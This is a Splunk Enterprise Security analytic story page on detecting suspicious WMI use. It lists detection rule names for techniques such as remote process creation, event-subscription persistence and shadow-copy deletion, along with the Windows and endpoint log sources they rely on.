GitHub Repo

Analytics Story: Suspicious WMI Use

Updated Date: 2026-05-13 ID: c8ddc5be-69bc-4202-b3ab-4010b27d7ad5 Author: Rico Valdez, Splunk Product: Splunk Enterprise Security

Description

Attackers are increasingly abusing Windows Management Instrumentation (WMI), a framework and associated utilities available on all modern Windows operating systems. Because WMI can be leveraged to manage both local and remote systems, it is important to identify the processes executed and the user context within which the activity occurred.

Why it matters

WMI is a Microsoft infrastructure for management data and operations on Windows operating systems. It includes of a set of utilities that can be leveraged to manage both local and remote Windows systems. Attackers are increasingly turning to WMI abuse in their efforts to conduct nefarious tasks, such as reconnaissance, detection of antivirus and virtual machines, code execution, lateral movement, persistence, and data exfiltration. The detection searches included in this Analytic Story are used to look for suspicious use of WMI commands that attackers may leverage to interact with remote systems. The searches specifically look for the use of WMI to run processes on remote systems. In the event that unauthorized WMI execution occurs, it will be important for analysts and investigators to determine the context of the event. These details may provide insights related to how WMI was used and to what end.

Detections

Name ▲▼ Technique ▲▼ Type ▲▼
WMIC XSL Execution via URL XSL Script Processing TTP
XSL Script Execution With WMIC XSL Script Processing TTP
Script Execution via WMI Windows Management Instrumentation TTP
PowerShell Invoke WmiExec Usage Windows Management Instrumentation TTP
Windows WMIC Shadowcopy Delete Inhibit System Recovery Anomaly
Remote Process Instantiation via WMI Windows Management Instrumentation TTP
WMI Temporary Event Subscription Windows Management Instrumentation TTP
Windows WMI Process Call Create Windows Management Instrumentation Hunting
Detect WMI Event Subscription Persistence Windows Management Instrumentation Event Subscription TTP
Process Execution via WMI Windows Management Instrumentation TTP
WMI Permanent Event Subscription - Sysmon Windows Management Instrumentation Event Subscription TTP
Remote WMI Command Attempt Windows Management Instrumentation TTP
WMI Permanent Event Subscription Windows Management Instrumentation TTP

Data Sources

Name ▲▼ Platform ▲▼ Sourcetype ▲▼ Source ▲▼
CrowdStrike ProcessRollup2 Other crowdstrike:events:sensor crowdstrike
Sysmon EventID 1 Windows icon Windows XmlWinEventLog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Windows Event Log Security 4688 Windows icon Windows XmlWinEventLog XmlWinEventLog:Security
Cisco Network Visibility Module Flow Data Network icon Network cisco:nvm:flowdata not_applicable
Powershell Script Block Logging 4104 Windows icon Windows XmlWinEventLog XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
Sysmon EventID 20 Windows icon Windows XmlWinEventLog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 21 Windows icon Windows XmlWinEventLog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

References

Source: GitHub | Version: 3